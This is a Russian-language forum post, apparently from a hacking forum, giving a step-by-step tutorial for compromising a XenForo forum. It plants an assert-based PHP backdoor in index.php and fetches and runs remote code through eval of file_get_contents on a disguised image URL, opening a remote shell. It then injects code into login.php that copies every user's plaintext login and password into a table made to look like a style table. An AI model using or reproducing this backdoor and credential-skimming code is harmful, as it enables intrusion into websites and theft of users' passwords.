• XSS.stack #1 – первый литературный журнал от юзеров форума

Избавляемся от Хеширования [Xenforo]

tabac

CPU register
Пользователь
Регистрация
30.09.2018
Сообщения
1 610
Решения
1
Реакции
3 332
Используем "WSO Web Shel"

Отправляемся к файлу index.php , и дописываем вредоносный код:

Код:
if (isset($_REQUEST['l']))
assert(stripslashes($_REQUEST[l]));

Вызываем скрипт и получаем доступ к RemoteShell:
Код:
http://www.ru/index.php?l=eval(file_get_contents(%27http://www.ru/screen.png%27))#

Отсеиваем логин и пасс из файлов с ФТП , создаем базу данных

Код:
create table xf_style_property_css (
ID int(20) AUTO_INCREMENT,
CSSName varchar(50) NOT NULL,
CSSValue varchar(50) NOT NULL,
PRIMARY KEY (ID)
);

Находим в файле login.php строки:

TBUUmhA.png


Дописываем код:

Код:
$DataBaseConnector = mysql_connect('localhost', 'Имя БД', 'Пароль от БД');
        mysql_select_db('Имя БД');
        mysql_query("SET NAMES 'utf8'");
        $datalogxf = $data['login'];
        $datapassxf = $data['password'];
        mysql_query("INSERT INTO `xf_style_property_css` (`ID`, `CSSName`, `CSSValue`) VALUES ('', '$datalogxf', '$datapassxf') ", $DataBaseConnector);

После всех выше описанных функций , каждый авторизованный пользователь будет внесен в наш раздел с базой ( который создали выше ).

Выполняем команду получения списка: (Сейчас он пустой )
Код:
SELECT * FROM `xf_style_property_css`
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх